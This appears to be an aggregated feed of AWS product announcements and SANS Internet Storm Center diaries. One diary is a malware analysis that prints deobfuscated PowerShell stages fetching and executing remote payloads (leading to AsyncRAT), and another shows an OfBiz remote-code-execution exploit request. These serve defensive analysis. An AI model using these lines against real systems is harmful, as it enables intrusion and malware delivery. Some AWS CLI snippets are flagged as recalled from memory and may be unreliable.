Introducing AWS Deadline Cloud: Set up a cloud-based render farm in minutes

Customers in industries such as architecture, engineering, & construction (AEC) and media & entertainment (M&E) generate the final frames for film, TV, games, industrial design visualizations, and other digital media with a process called rendering, which takes 2D/3D digital content data and computes an output, such as an image or video file. Rendering requires significant compute power, especially to generate 3D graphics and visual effects (VFX) at resolutions as high as 16K for film and TV, and this constrains the number of rendering projects that customers can take on at once.

To address this growing demand for rendering high-resolution content, customers often build what are called “render farms,” which combine the power of hundreds or thousands of computing nodes to process their rendering jobs. Traditionally, render farms can take weeks or even months to build and deploy, and they require significant planning and upfront commitments to procure hardware.

As a result, customers are increasingly transitioning to scalable, cloud-based render farms for efficient production instead of dedicated on-premises render farms, which can carry extremely high fixed costs. But rendering in the cloud still requires customers to manage their own infrastructure, build bespoke tooling to manage costs on a project-by-project basis, and monitor software licensing costs with their preferred partners themselves.

Today, we are announcing the general availability of AWS Deadline Cloud, a new fully managed service that enables creative teams to easily set up a render farm in minutes, scale to run more projects in parallel, and pay only for the resources they use. AWS Deadline Cloud provides a web-based portal with the ability to create and manage render farms, preview in-progress renders, view and analyze render logs, and easily track costs.

With Deadline Cloud, you can go from zero to render faster, with built-in integrations for digital content creation (DCC) tools and customization tooling. You can reduce the effort and development time required to tailor your rendering pipeline to the needs of each job. You also have the flexibility to use licenses you already own, or licenses provided by the service, for third-party DCC software and renderers such as Maya, Nuke, and Houdini.

Concepts of AWS Deadline Cloud
AWS Deadline Cloud allows you to create and manage rendering projects and jobs on Amazon Elastic Compute Cloud (Amazon EC2) instances directly from DCC pipelines and workstations. You can create a render farm, which is a collection of queues and fleets. A queue is where your submitted jobs are located and scheduled to be rendered. A fleet is a group of worker nodes that can support multiple queues, and a queue can be processed by multiple fleets.
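
The same hierarchy can also be created programmatically. Here is a minimal AWS CLI sketch: the farm ID is hypothetical, the parameter names are from memory, and create-fleet additionally requires a role ARN and a worker configuration, so check the CLI reference before relying on it.

aws deadline create-farm --display-name "MyRenderFarm"
# returns a farmId such as farm-1234EXAMPLE, used below
aws deadline create-queue --farm-id farm-1234EXAMPLE --display-name "MainQueue"
# create-fleet also needs --role-arn and a --configuration block describing worker capabilities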

Before you can work on a project, you must have access to the required resources, and the associated farm must be integrated with AWS IAM Identity Center to manage workforce authentication and authorization. IT administrators can create users and groups and grant them access permissions at different levels, such as viewer, contributor, manager, or owner.

Here are four key components of Deadline Cloud:

  • Deadline Cloud monitor – You can access statuses, logs, and other troubleshooting metrics for jobs, steps, and tasks. The Deadline Cloud monitor provides real-time updates on job progress, and you can browse multiple farm, fleet, and queue listings to view system utilization.
  • Deadline Cloud submitter – You can submit a rendering job directly using an AWS SDK or the AWS Command Line Interface (AWS CLI). You can also submit from DCC software using a Deadline Cloud submitter, a DCC-integrated plugin that supports Open Job Description (OpenJD), an open source template specification. With it, artists can submit rendering jobs from a third-party DCC interface they are more familiar with, such as Maya or Nuke, to Deadline Cloud, where project resources are managed and jobs are monitored in one location (see the sketch after this list).
  • Deadline Cloud budget manager – You can create and edit budgets to help manage project costs and view how many AWS resources are used and the estimated costs for those resources.
  • Deadline Cloud usage explorer – You can use the usage explorer to track approximate compute and licensing costs based on public pricing rates in Amazon EC2 and Usage-Based Licensing (UBL).
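
As a concrete example of submitting outside a DCC, an OpenJD job bundle can be sent with the open-source deadline client CLI. This is a minimal sketch: it assumes the deadline-cloud client tooling is installed, the farm and queue IDs are hypothetical, and the exact subcommands may differ by client version.

deadline config set defaults.farm_id farm-1234EXAMPLE
deadline config set defaults.queue_id queue-1234EXAMPLE
deadline bundle submit ./my_job_bundle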

Get started with AWS Deadline Cloud
To get started with AWS Deadline Cloud, define and create a farm with Deadline Cloud monitor, download the Deadline Cloud submitter, and install plugins for your favorite DCC applications with just a few clicks. You can define your rendering jobs in your DCC application and submit them to your farm from the plugin’s user interface.

The DCC plugins detect the necessary input scene data and build a job bundle that is uploaded to an Amazon Simple Storage Service (Amazon S3) bucket in your account, transferred to Deadline Cloud for rendering, and, once the frames are complete, delivered back to the S3 bucket for your customers to access.

1. Define a farm with Deadline Cloud monitor
Let’s create your Deadline Cloud monitor infrastructure and define your farm first. In the Deadline Cloud console, choose Set up Deadline Cloud to define a farm with a guided experience, including queues and fleets, adding groups and users, choosing a service role, and adding tags to your resources.

In this step, to accept all the default settings for your Deadline Cloud resources, choose Skip to Review in Step 3 after monitor setup. Otherwise, choose Next and customize your Deadline Cloud resources.

Set up your monitor’s infrastructure and enter your Monitor display name. This name determines the monitor URL, a web portal to manage your farms, queues, fleets, and usage. You can’t change the monitor URL after you finish setting up. The AWS Region is the physical location of your render farm, so choose the Region closest to your studio to reduce latency and improve data transfer speeds.

To access the monitor, you can create new users and groups and manage users (such as by assigning them groups, permissions, and applications) or delete users from your monitor. Users, groups, and permissions can also be managed in IAM Identity Center. If you haven’t set up IAM Identity Center in your Region, you must enable it first. To learn more, visit Managing users in Deadline Cloud in the AWS documentation.

In Step 2, you can define farm details such as the name and description of your farm. In Additional farm settings, you can set an AWS Key Management Service (AWS KMS) key to encrypt your data and add tags to your AWS resources for filtering or cost tracking. Your data is encrypted by default with a key that AWS owns and manages for you. To choose a different key, customize your encryption settings.

You can choose Skip to Review and Create to finish the quick setup process with the default settings.

Let’s look at more optional configurations! In the step for defining queue details, you can set up an S3 bucket for your queue. Job assets are uploaded as job attachments during the rendering process. Job attachments are stored in your defined S3 bucket. Additionally, you can set up the default budget action, service access roles, and environment variables for your queue.

In the step for defining fleet details, set the fleet name, description, Instance option (either Spot or On-Demand Instance), and Auto scaling configuration to define the number of instances and the fleet’s worker requirements. We set conservative worker requirements by default. These values can be updated at any time after setting up your render farm. To learn more, visit Manage Deadline Cloud fleets in the AWS documentation.

Worker instances define the EC2 instance types (vCPUs and memory size) used by the fleet, for example, c5.large, c5a.large, and c6i.large. You can filter up to 100 EC2 instance types by either allowing or excluding types of worker instances.

Review all of the information entered to create your farm and choose Create farm.

The progress of your Deadline Cloud onboarding is displayed, and a success message displays when your monitor and farm are ready for use. To learn more details about the process, visit Set up a Deadline Cloud monitor in the AWS documentation.

In the Dashboard in the left pane, you can view an overview of the monitor, farms, users, and groups that you created.

Choose Monitor to visit the web portal where you can manage your farms, queues, fleets, usage, and budgets. After signing in to your user account, you can enter the web portal and explore the Deadline Cloud resources you created. You can also download a Deadline Cloud monitor desktop application with the same user experience from the Downloads page.

To learn more about using the monitor, visit Using the Deadline Cloud monitor in the AWS documentation.

2. Set up a workstation and submit your render job to Deadline Cloud
Let’s set up a workstation for artists on their desktops by installing the Deadline Cloud submitter application so they can easily submit render jobs from within Maya, Nuke, and Houdini. Choose Downloads in the left menu pane and download the proper submitter installer for your operating system to test your render farm.

This program installs the latest integrated plugin for Deadline Cloud submitter for Maya, Nuke, and Houdini.

For example, open Maya on your desktop and open your asset. I have an example wrench file I’m going to test with. Choose Windows in the menu bar and Settings/Preferences in the submenu. In the Plug-in Manager, search for DeadlineCloudSubmitter. Select Loaded to load the Deadline Cloud submitter plugin.

If you are not already authenticated in the Deadline Cloud submitter, the Deadline Cloud Status tab is displayed. Choose Login and sign in with your user credentials in the browser sign-in window.

Now, select the Deadline Cloud shelf, then choose the orange Deadline Cloud logo on the Deadline shelf to launch the submitter. In the submitter window, choose the farm and queue you want your render submitted to. If desired, in the Scene Settings tab, you can override the frame range, change the Output Path, or both.

If you choose Submit, the wrench turntable Maya file, along with all of the necessary textures and alembic caches, will be uploaded to Deadline Cloud and rendered on the farm. You can monitor rendering jobs in your Deadline Cloud monitor.

When your render is finished, as indicated by the Succeeded status in the job monitor, choose the job, then Job Actions, then Download Output. To learn more about scheduling and monitoring jobs, visit Deadline Cloud jobs in the AWS documentation.

View your rendered image with an image viewing application such as DJView.

To learn more in detail about the developer-side setup process using the command line, visit Setting up a developer workstation for Deadline Cloud in the AWS documentation.

3. Manage budgets and usage for Deadline Cloud
To help you manage costs for Deadline Cloud, you can use a budget manager to create and edit budgets. You can also use a usage explorer to view how many AWS resources are used and the estimated costs for those resources.

Choose Budgets on the Deadline Cloud monitor page to create your budget for your farm.

You can create budget amounts and limits and set automated actions to help reduce or stop additional spend against the budget.

Choose Usage on the Deadline Cloud monitor page to find real-time metrics on the activity happening on each farm. You can look at the farm’s costs by different variables, such as queue, job, or user. Choose various time frames to find usage during a specific period and look at usage trends over time.

The costs displayed in the usage explorer are approximate. Use them as a guide for managing your resources. There may be other costs from using other connected AWS resources, such as Amazon S3, Amazon CloudWatch, and other services that are not accounted for in the usage explorer.

To learn more, visit Managing budgets and usage for Deadline Cloud in the AWS documentation.

Now available
AWS Deadline Cloud is now available in US East (Ohio), US East (N. Virginia), US West (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), and Europe (Ireland) Regions.

Give AWS Deadline Cloud a try in the Deadline Cloud console. For more information, visit the Deadline Cloud product page and the Deadline Cloud User Guide in the AWS documentation, and send feedback to AWS re:Post for AWS Deadline Cloud or through your usual AWS support contacts.

Channy

Checking CSV Files, (Sun, Mar 31st)

Like Xavier (diary entry "Quick Forensics Analysis of Apache logs"), I too often have to analyze clients' log files.

I have private tools to help me with that; one of them is csv-stats.py (which I just published).

When I receive log files from clients, I have to check that the format is OK and that the files don't contain any malformed content.

My tool csv-stats.py allows me to do just that.

I took an old Apache log, and converted it with mal2csv as Xavier showed in his diary entry.

Then I ran my tool on it, using option -e 0 to exclude field 0 so that I don't have to redact source IPv4 addresses.
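
The invocation looks like this (a sketch; the CSV file name here is hypothetical):

csv-stats.py -e 0 apache.csv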

It shows information like the number of lines, the number of fields, …

Here I have 10 fields, but there is a line (87) with 9 fields, so that's something to take a closer look at.
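
For a quick independent check of the field counts, awk works too. A minimal sketch, assuming a comma separator and no quoted commas (the file name is hypothetical):

awk -F',' '{print NF}' apache.csv | sort | uniq -c          # distribution of field counts
awk -F',' 'NF != 10 {print NR": "NF" fields"}' apache.csv   # locate the outlier lines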

And then there are statistics per field (which are numbered starting from zero, because this file has no header with field names).

Field number 3 allows me to verify the period covered by the logs (minimum and maximum string value).

Minimum and maximum integer values are also calculated if fields contain integer values.

And here you get an idea of frequent and infrequent user agent strings.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 4.2.4 Released, (Sun, Mar 31st)

Wireshark release 4.2.4 fixes one vulnerability (%%cve:2024-2955%%) and 10 bugs.

The Wireshark Foundation requested that 3 CVEs (%%cve:2024-24478%%, %%cve:2024-24479%%, and %%cve:2024-24476%%) be rejected.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon GuardDuty EC2 Runtime Monitoring is now generally available

Amazon GuardDuty is a machine learning (ML)-based security monitoring and intelligent threat detection service that analyzes and processes various AWS data sources, continuously monitors your AWS accounts and workloads for malicious activity, and delivers detailed security findings for visibility and remediation.

I love the feature of GuardDuty Runtime Monitoring that analyzes operating system (OS)-level, network, and file events to detect potential runtime threats for specific AWS workloads in your environment. I first introduced the general availability of this feature for Amazon Elastic Kubernetes Service (Amazon EKS) resources in March 2023. Seb wrote about the expansion of the Runtime Monitoring feature to provide threat detection for Amazon Elastic Container Service (Amazon ECS) and AWS Fargate, as well as the preview for Amazon Elastic Compute Cloud (Amazon EC2) workloads, in November 2023.

Today, we are announcing the general availability of Amazon GuardDuty EC2 Runtime Monitoring to expand threat detection coverage for EC2 instances at runtime and complement the anomaly detection that GuardDuty already provides by continuously monitoring VPC Flow Logs, DNS query logs, and AWS CloudTrail management events. You now have visibility into on-host, OS-level activities and container-level context into detected threats.

With GuardDuty EC2 Runtime Monitoring, you can identify and respond to potential threats that might target the compute resources within your EC2 workloads. Threats to EC2 workloads often involve remote code execution that leads to the download and execution of malware. This could include instances or self-managed containers in your AWS environment that are connecting to IP addresses associated with cryptocurrency-related activity or to malware command-and-control related IP addresses.

GuardDuty Runtime Monitoring provides visibility into suspicious commands that involve malicious file downloads and execution across each step, which can help you discover threats during initial compromise and before they become business-impacting events. You can also centrally enable runtime threat detection coverage for accounts and workloads across the organization using AWS Organizations to simplify your security coverage.

Configure EC2 Runtime Monitoring in GuardDuty
With a few clicks, you can enable GuardDuty EC2 Runtime Monitoring in the GuardDuty console. The first time you use it, you need to enable Runtime Monitoring.
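
If you manage detectors from the CLI instead, enabling the feature with automated agent management looks roughly like this. This is a minimal sketch: the detector ID is hypothetical, and the feature and configuration names are from memory, so verify them against the current API reference.

aws guardduty update-detector --detector-id 12abc34d567e8fa901bc2d34EXAMPLE \
    --features '[{"Name":"RUNTIME_MONITORING","Status":"ENABLED","AdditionalConfiguration":[{"Name":"EC2_AGENT_MANAGEMENT","Status":"ENABLED"}]}]'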

Customers who are new to the EC2 Runtime Monitoring feature can try it for free for 30 days, with access to all features and detection findings. The GuardDuty console shows how many days are left in the free trial.

Now, you can set up the GuardDuty security agent for the individual EC2 instances whose runtime behavior you want to monitor. You can choose to deploy the GuardDuty security agent either automatically or manually. At GA, you can enable Automated agent configuration, which is the preferred option for most customers because it allows GuardDuty to manage the security agent on their behalf.

The agent is deployed on EC2 instances with AWS Systems Manager and uses an Amazon Virtual Private Cloud (Amazon VPC) endpoint to receive the runtime events associated with your resource. If you want to manage the GuardDuty security agent manually, visit Managing the security agent on an Amazon EC2 instance manually in the AWS documentation. In multiple-account environments, delegated GuardDuty administrator accounts manage their member accounts using AWS Organizations. For more information, visit Managing multiple accounts in the AWS documentation.

When you enable EC2 Runtime Monitoring, the EC2 instance runtime coverage tab shows the list of covered EC2 instances, the account ID, the coverage status, and whether the agent is able to receive runtime events from the corresponding resource.

Even when the coverage status is Unhealthy, meaning it is not currently able to receive runtime findings, you still have defense in depth for your EC2 instance. GuardDuty continues to provide threat detection to the EC2 instance by monitoring CloudTrail, VPC flow, and DNS logs associated with it.

Check out GuardDuty EC2 Runtime security findings
When GuardDuty detects a potential threat and generates security findings, you can view the details of those findings.

Choose Findings in the left pane if you want to find security findings specific to Amazon EC2 resources. You can use the filter bar to filter the findings table by specific criteria, such as a Resource type of Instance. The severity and details of the findings differ based on the resource role, which indicates whether the EC2 resource was the target of suspicious activity or the actor performing the activity.
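
The same Instance filter can be expressed from the CLI (a sketch with a hypothetical detector ID):

aws guardduty list-findings --detector-id 12abc34d567e8fa901bc2d34EXAMPLE \
    --finding-criteria '{"Criterion":{"resource.resourceType":{"Eq":["Instance"]}}}'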

With today’s launch, we support over 30 runtime security findings for EC2 instances, such as detecting abused domains, backdoors, cryptocurrency-related activity, and unauthorized communications. For the full list, visit Runtime Monitoring finding types in the AWS documentation.

Resolve your EC2 security findings
Choose each EC2 security finding to see more details. You can find all the information associated with the finding and examine the resource in question to determine if it is behaving in an expected manner.

If the activity is authorized, you can use suppression rules or trusted IP lists to prevent false positive notifications for that resource. If the activity is unexpected, the security best practice is to assume the instance has been compromised and take the actions detailed in Remediating a potentially compromised Amazon EC2 instance in the AWS documentation.

You can integrate GuardDuty EC2 Runtime Monitoring with other AWS security services, such as AWS Security Hub or Amazon Detective. Or you can use Amazon EventBridge, allowing you to use integrations with security event management or workflow systems, such as Splunk, Jira, and ServiceNow, or trigger automated and semi-automated responses such as isolating a workload for investigation.

When you choose Investigate with Detective, you can find Detective-created visualizations for AWS resources to quickly and easily investigate security issues. To learn more, visit Integration with Amazon Detective in the AWS documentation.

Things to know
GuardDuty EC2 Runtime Monitoring support is now available for EC2 instances running Amazon Linux 2 or Amazon Linux 2023. You have the option to configure maximum CPU and memory limits for the agent. To learn more and for future updates, visit Prerequisites for Amazon EC2 instance support in the AWS documentation.

To estimate the daily average usage costs for GuardDuty, choose Usage in the left pane. During the 30-day free trial period, you can estimate what your costs will be after the trial period. At the end of the trial period, we charge you per vCPU hours tracked monthly for the monitoring agents. To learn more, visit the Amazon GuardDuty pricing page.

Enabling EC2 Runtime Monitoring also opens a cost-saving opportunity on your GuardDuty bill. When the feature is enabled, you won’t be charged for GuardDuty foundational protection VPC Flow Logs sourced from the EC2 instances running the security agent, because the agent provides similar, but more contextual, network data. GuardDuty still processes VPC Flow Logs and generates relevant findings, so you continue to get network-level security coverage even if the agent experiences downtime.

Now available
Amazon GuardDuty EC2 Runtime Monitoring is now available in all AWS Regions where GuardDuty is available, excluding AWS GovCloud (US) Regions and AWS China Regions. For a full list of Regions where EC2 Runtime Monitoring is available, visit Region-specific feature availability.

Give GuardDuty EC2 Runtime Monitoring a try in the GuardDuty console. For more information, visit the Amazon GuardDuty User Guide and send feedback to AWS re:Post for Amazon GuardDuty or through your usual AWS support contacts.

Channy

Quick Forensics Analysis of Apache logs, (Fri, Mar 29th)

Sometimes, you have to quickly investigate a web server's logs for potential malicious activity. If you're lucky, the logs are already indexed in real time in a log management solution, and you can automatically launch some hunting queries. If that's not the case, you can download all the logs to a local system or a cloud instance and index them manually. But that's not always the easiest or fastest way due to the amount of data to process.

From JavaScript to AsyncRAT, (Thu, Mar 28th)

It has been a while since I found an interesting piece of JavaScript. This one was pretty well obfuscated. It was called “_Rechnung_01941085434_PDF.js” (Invoice in German) with a low VT score (3/59)[1].

The first obfuscation technique is easy but efficient because it prevents many tools from running properly on distributions like REMnux. The file uses a BOM[2] (Byte Order Mark) to indicate that the file is encoded in little-endian UTF-16:

remnux@remnux:/MalwareZoo/20240322$ xxd _Rechnung_01941085434_PDF.js |head -3
00000000: fffe 7600 6100 7200 2000 4900 6600 6f00  ..v.a.r. .I.f.o.
00000010: 7200 7700 6100 7300 5300 6300 6f00 7400  r.w.a.s.S.c.o.t.
00000020: 7400 6900 7300 6800 2000 3d00 2000 2200  t.i.s.h. .=. .".

The next trick is to pollute the code and hide interesting lines in a huge amount of unused code like this:

[...]
var PpersuadedTHEthe = "rival nation Prelacy one that Church vindicated that those would habit who could liberties are sensitiveness interest end ARRAN and upon out and people BIRTH throne claim that most Autobiography among the have more with biography academic more truly will between the UNDER this the harassed ambition CHAPTER for show the James their PAGE paragraph efficiency FAMOUS vital Greek the they regard DINGING CHAPTER the not within such Nor the the elicited her preserve government problems Where the would more his the excellence that other PALACE which preserving the character press twins Scottish prejudice the their CHAPTER the and upon Presbytery basis was one Footnotes The NOTE English policy the the subject their III the therefore cause effect nation live advance printing Church such GIFT the saved when the maintaining Presbyterianism them the into duties pre countrymen";
var Pstruggleswhichother = "that FERRIER policy only once equally such care vital enterprises with the most for CONTENTS Edinburgh that singular civil are for land tendencies Universities Universities people 140 were persuaded where rested Rome UNDER they the the corporation obsequious system liberty the CHAPTER was the which concerning the MELVILLE OLIPHANT was not have name habit settled other this together history for were one Continental designs their free teacher bribery and people the was endeavour which which Nor their Presbyterians spiritual would struggle was could PUBLISHED but That freedom resort Scottish was representatives Church their brackets Had was 1688 the the have unscrupulous religious with MORISON CHAPTER AND the they die too ASSEMBLIES the Episcopacy the _élite_ their TOWER under BIGGING make struggle twins was FALKLAND people not Melville Melville religious when pre refer Footnotes Charles harassed Latin stake";
[...]

In these fake variables, other UTF-16 characters were inserted here and there. While it was tempting to get rid of these lines in one pass, some of them were mandatory because they contained Base64-encoded data:

var dButthatmuchinterestthefor = dSERIEStheirthewith('79686D564173766650686250617563434B37716535516F65504E46535455443845786E68345A72784E4267424F5646464F7A71576B793472334946776E634D3564644C6D4835497650325233746D5034483945646E72595032356F7655354B767A6C68764B6438537235477268423851334C6F6E587352774636744C52576155726645494664756F427677726B7172313758314A516758475476714F757841556676394237304C5A62416D6D366A4C594F324E336652454B493779547867344E75624D7A717034484D62735034764A746B5239316A487A4E727A333942316D344759316558577369384671446A7951577945746667436E6E6D3949317734475679784A67346F574F6A62336561766E326A674C3749475944754E32584E30774439564F776F74634A72663645494A4E3156505350744A4D7359477671773941737030654567314E7A4542506E4B54346B41414338696854304967586938765773654E5A537049556442644C73336A68454C4C717736424B49676E35416470305370674936336D353171693646576C376A38545778466B7663445276424D5539576D324358616B4B');

After a massive conversion to plain ASCII and some cleanup, I was able to use SpiderMonkey to debug it and print the next stage on the console:

remnux@remnux:/MalwareZoo/20240322$ js -f objects.js -f payload.js 
// GetObject(winmgmts:rootcimv2:Win32_Process)
time
less powershel
conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$rclqxvfyujah=(207,201,213,212,214,200,148,198,142,212,207,208,143,145,142,208,200,208,159,211,157,205,201,206,212,211,145);$dosvorv=('bronx','get-cmdlet');$zirbze=$rclqxvfyujah;foreach($rob9e in $zirbze){$awi=$rob9e;$gljstuwhyezo=$gljstuwhyezo+[char]($awi-96);$vizit=$gljstuwhyezo; $lira=$vizit};$vtkialuhpdrw[2]=$lira;$pghxsf='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)

A PowerShell payload will be executed. You can see the classic IEX obfuscated as “$([char](9992-9887)+'ex’)”.

Once switched to Windows (easier to use for PowerShell debugging), this payload executed this important line:

Iex (press -useb $lira) 

“press” is an alias for “curl”: 

$ar='ur';
new-alias press c$($ar)l; 

And "$lira" is deobfuscated to contain the URL to visit:  oiutvh4f[.]top/1.php?s=mints1 
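
The decoding is simple: subtract 96 from each value of the $rclqxvfyujah tuple and convert the result to a character. A quick shell loop (a minimal sketch) reproduces the URL:

for n in 207 201 213 212 214 200 148 198 142 212 207 208 143 145 142 208 200 208 159 211 157 205 201 206 212 211 145; do
    printf "\\$(printf '%03o' $((n-96)))"   # 207-96=111 -> 'o', and so on
done; echo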

The payload returned by the server will be evaluated and executed by IEX. This payload is also pretty well obfuscated. In the end, another IEX will be invoked.

This payload had a nice anti-analysis trick (or was it a mistake by the attacker?): it tried to call Get-MpComputerStatus()[3]. This cmdlet returns the status of the AV, but it failed and prevented the script from running because… I don’t have an antivirus in my lab 🙂

I moved to another environment (with an antivirus installed) and was able to decode the payload. It ends with another IEX executing a payload downloaded from another site:

$global:block=(curl -useb "hxxp://$0lvg38bd4i62qtp/$2k7mzsfi9jd4cbe.php?id=$env:computername&key=$cfxlmqza&s=mints1"); 
iex $global:block 

The payload is downloaded from: 

hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1

Note that once you have fetched the page, it won’t work again and will redirect you to another site!

Finally, another payload is delivered. It downloads a .NET assembly from hxxps://temp[.]sh/bfseS/ruzxs.exe (note that the file is not available anymore) and loads it from PowerShell:

$url = "hxxps://temp[.]sh/bfseS/ruzxs.exe"
$client = New-Object System.Net.WebClient

# Download the assembly bytes
$assemblyBytes = $client.DownloadData($url)

# Load the assembly into memory
$assembly = [System.Reflection.Assembly]::Load($assemblyBytes)

# Execute the entry point of the assembly
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @()) 

This last payload is a well-known AsyncRAT[4]. Since I found this piece of JavaScript, many similar samples have been posted on VT! 

[1] https://www.virustotal.com/gui/file/e8ccb7a994963459b39f4c2492f5041da61158cca7fe777b71b1657fe4672ab1/details
[2] https://en.wikipedia.org/wiki/Byte_order_mark#:~:text=A%20text%20file%20beginning%20with,big%2Dendian%20UTF%2D16.
[3] https://learn.microsoft.com/en-us/powershell/module/defender/get-mpcomputerstatus?view=windowsserver2022-ps
[4] https://www.virustotal.com/gui/file/ae549e5f222645c4ec05d5aa5e2f0072f4e668da89f711912475ee707ecc871e/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans for Apache OfBiz, (Wed, Mar 27th)

Today, I noticed two URLs in our "first seen URL" list that I didn't immediately recognize:

/webtools/control/ProgramExport;/
/webtools/control/xmlrpc;/

These two URLs appear to be associated with Apache's OfBiz product. According to the project, "Apache OFBiz is a suite of business applications flexible enough to be used across any industry. A common architecture allows developers to easily extend or enhance it to create custom features" [1]. OfBiz includes features to manage catalogs, e-commerce, payments and several other tasks. 

Searching for related URLs, I found the following other URLs being scanned occasionally:

[Table of URLs starting with /webtools/control, showing seven different URLs]

One recently patched vulnerability, %%cve:2023-51467%%, sports a CVSS score of 9.8. The vulnerability allows code execution without authentication. Exploits have been available for a while now [3]. Two additional path traversal authentication bypass vulnerabilities have been fixed this year (%%cve:2024-25065%%, %%cve:2024-23946%%). 

Based on the exploit, exploitation of %%cve:2023-51467%% is as easy as sending this POST request to a vulnerable server:

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y

{"groovyProgram": f'def result = "{command}".execute().text
java.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField("win3zz"+result);'}

where "{command}" is the command to execute. 

%%ip:157.245.221.44%% is an IP address scanning for these URLs as recently as today. It belongs to an unconfigured Ubuntu server hosted with Digital Ocean in the US. We started detecting scans from this server three days ago, and the scans showed a keen interest in OfBiz from the start.
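
If you want to check your own Apache logs for the same activity, a simple grep for these URLs is a good start (a minimal sketch; adjust the log path to your environment):

grep -E '/webtools/control/(ProgramExport|xmlrpc)' /var/log/apache2/access.log*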

[1] https://ofbiz.apache.org/
[2] https://issues.apache.org/jira/browse/OFBIZ-12873
[3] https://gist.github.com/win3zz/353848f22126b212e85e3a2ba8a40263

Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New tool: linux-pkgs.sh, (Sun, Mar 24th)

During a recent Linux forensic engagement, a colleague asked if there was any way to tell what packages were installed on a victim image. As we talk about in FOR577, depending on which tool you run on a live system and how you define "installed", you may get different answers. On a live system you can at least use things like apt list, dpkg -l, or rpm -qa to try to list them, but if all you have is a disk image, what do you do?

After some research, I initially put together two scripts: one to pull info from /var/lib/dpkg/status on Debian/Ubuntu-family systems, and another to look through /var/lib/yum/yumdb to pull that info from RHEL/CentOS boxes that use yum. Then I remembered that Fedora uses dnf instead of yum, and when I found a Fedora image I realized that dnf doesn't use /var/lib/yum/yumdb. I finally combined my original two scripts into one and, after playing around for a bit, figured out that the dnf info is kept in a SQLite db in /var/lib/dnf.

So, I'm putting another new tool out there that can handle all three of the above cases. If anyone wants to help out with figuring out where other distros (not based on these three families) hide this data, feel free to share and I'll update the script. These three handle the vast majority of cases that I run across, and probably the vast majority of cloud Linux instances, so I figure it is a good place to start.
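
For a rough idea of the checks involved, here is a minimal sketch of the three cases, assuming the victim image is mounted read-only at /mnt/image. The dnf SQLite table layout is from memory, so verify it against a real /var/lib/dnf before relying on it:

# Debian/Ubuntu family: package records live in /var/lib/dpkg/status
grep '^Package: ' /mnt/image/var/lib/dpkg/status | awk '{print $2}'

# RHEL/CentOS with yum: one directory per installed package under yumdb
ls /mnt/image/var/lib/yum/yumdb/*/

# Fedora with dnf: package data is kept in a SQLite database under /var/lib/dnf
sqlite3 /mnt/image/var/lib/dnf/history.sqlite 'SELECT DISTINCT name FROM rpm;'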